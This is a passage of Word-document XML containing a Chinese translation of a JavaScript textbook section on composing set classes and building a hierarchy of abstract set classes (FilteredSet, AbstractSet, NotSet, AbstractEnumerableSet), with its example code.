        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.set.add.apply(this.set,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//</w:t>
      </w:r>
      <w:r>
        <w:t>剩下的方法都保持不变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>remove:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.set.remove.apply(this.set,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contains</w:t>
      </w:r>
      <w:r>
        <w:t>:function(v){return this.set.contains(v);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>size:function(){return this.set.size();},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f,c){this.set.foreach(f,c);}</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在这个例子中使用组合的一个好处是，只须创建一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>FilteredSet</w:t>
      </w:r>
      <w:r>
        <w:t>子类即可。可以利用这个类的实例来创建任意带有成员限制的集合实例。比如，不用上文中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullSet</w:t>
      </w:r>
      <w:r>
        <w:t>类，可以这样做：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var s=new </w:t>
      </w:r>
      <w:r>
        <w:t>FilteredSet(new Set(),function(x){return x!==null;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>甚至还可以对已经过滤后的集合进行过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var t=new FilteredSet(s,{function(x){return!(x instanceof Set);}};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="9_7_4_Lei_De_Ceng_Ci_Jie_Gou_He_Chou_Xia"/>
      <w:r>
        <w:t>9.7.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类的层次结构和抽象类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在上一节中给出了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>组合优于继承</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的原则，但为了将这条原则阐述清楚，创建了</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的子类。这样做的原因是最终得到的类是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>，它会从</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>继承有用的辅助方法，比如</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>。尽管这是一个很实际的原因，但不用创建类似</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类这种具体类的子类也可以很好的用组合来实现</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>范围</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-12</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>类可以有另外一种类似的实现，这个类还是继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>，因此它可以继承很多辅助方法，但它的实现和其父类的实现完全不一样。</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>并不是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的专用版本，而是完全不同的另一种</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>。在类层次结构中</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>应当是兄弟的关系，而非父子关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不管是在经典的面向对象编</w:t>
      </w:r>
      <w:r>
        <w:t>程语言中还是在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，通行的解决办法是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>从实现中抽离出接口</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。假定定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractSet</w:t>
      </w:r>
      <w:r>
        <w:t>类，其中定义了一些辅助方法比如</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，但并没有实现诸如</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
      <w:r>
        <w:t>的核心方法。这样，实现的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FilteredSet</w:t>
      </w:r>
      <w:r>
        <w:t>都是这个抽象类的子类，</w:t>
      </w:r>
      <w:r>
        <w:t>FilteredSet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>都不必再实现为某个不相关的类的子类了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-16</w:t>
      </w:r>
      <w:r>
        <w:t>在这个思路上更进一步，定义了一个层次结构的抽象的集合类。</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractSet</w:t>
      </w:r>
      <w:r>
        <w:t>只定义了一个抽象方法：</w:t>
      </w:r>
      <w:r>
        <w:t>co</w:t>
      </w:r>
      <w:r>
        <w:t>ntains()</w:t>
      </w:r>
      <w:r>
        <w:t>。任何类只要</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>声称</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>自己是一个表示范围的类，就必须至少定义这个</w:t>
      </w:r>
      <w:r>
        <w:t>co</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ntains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。然后，定义</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractSet</w:t>
      </w:r>
      <w:r>
        <w:t>的子类</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractEnumerableSet</w:t>
      </w:r>
      <w:r>
        <w:t>。这个类增加了抽象的</w:t>
      </w:r>
      <w:r>
        <w:t>size()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，而且定义了一些有用的非抽象方法（</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>等），</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractEnumerableSet</w:t>
      </w:r>
      <w:r>
        <w:t>并没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它只代表只读集合。</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>可以实现为非抽象子类。最后，定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Abstra</w:t>
      </w:r>
      <w:r>
        <w:t>ctEnumerableSet</w:t>
      </w:r>
      <w:r>
        <w:t>的子类</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractWritableSet</w:t>
      </w:r>
      <w:r>
        <w:t>。这个</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>抽象集合定义了抽象方法</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>，并实现了诸如</w:t>
      </w:r>
      <w:r>
        <w:t>union()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>intersection()</w:t>
      </w:r>
      <w:r>
        <w:t>等非具体方法，这两个方法调用了</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractWritableSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FilteredSet</w:t>
      </w:r>
      <w:r>
        <w:t>类相应的父类。但这个例子中并没有实现它，而是实现了一个新的名叫</w:t>
      </w:r>
      <w:r>
        <w:t>ArraySet</w:t>
      </w:r>
      <w:r>
        <w:t>的非抽象类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-16</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码很长，但还是应当完整地阅读一遍。注意这里用到了</w:t>
      </w:r>
      <w:r>
        <w:t>Function.proto</w:t>
      </w:r>
      <w:r>
        <w:t>type.extend()</w:t>
      </w:r>
      <w:r>
        <w:t>作为创建子类的快捷方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-16</w:t>
      </w:r>
      <w:r>
        <w:t>：抽象类和非抽象</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的层次结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数可以用做任何抽象方法，非常方便</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function abstractmethod(){throw new Error("abstract method");}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*AbstractSet</w:t>
      </w:r>
      <w:r>
        <w:t>类定义了一个抽象方法：</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function AbstractSet(){throw new Error("Can't instantiate abstract classes");}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Abs</w:t>
      </w:r>
      <w:r>
        <w:t>tractSet.prototype.contains=abstractmethod;/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*NotSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractSet</w:t>
      </w:r>
      <w:r>
        <w:t>的一个非抽象子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>所有不在其他集合中的成员都在这个集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>因为它是在其他集合是不可写的条件下定义的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>同时由于它的成员是无限个，因此它是不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>我们只能用它来检测元素成员的归属情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>注意，我们使用了</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype.extend()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来定义这个子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var NotSet=AbstractSet.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function NotSet</w:t>
      </w:r>
      <w:r>
        <w:t>(set){this.set=set;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contains:function(x){return!this.set.contains(x);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(x){return"</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>"+this.set.toString();},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>equals:function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return that instanceof NotSet</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>this.set.equals(that.set);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*AbstractEnumerableSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractSet</w:t>
      </w:r>
      <w:r>
        <w:t>的一个抽象子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它定义了抽象方法</w:t>
      </w:r>
      <w:r>
        <w:t>size()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>然后实现了非抽象方法</w:t>
      </w:r>
      <w:r>
        <w:t>isEmpty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>to[Locale]String()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>子类实现了</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>size()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
      <w:r>
        <w:t>，这三个方法可以很轻易地调用这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个非抽象方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var AbstractEnumerableSet=AbstractSet.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(){throw new E</w:t>
      </w:r>
      <w:r>
        <w:t>rror("Can't instantiate abstract classes");},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>size:abstractmethod,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:abstractmethod,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isEmpty:function(){return this.size()==0;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="{",i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i++</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0)s+=",";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s+=v;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s+"}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="{",i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i++</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0)s+=",";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(v==null)s+=v;//null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else s+=v.toLocaleString();//</w:t>
      </w:r>
      <w:r>
        <w:t>其他的情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s+"}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toArray:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){a.push(v);});</w:t>
      </w:r>
    </w:p>
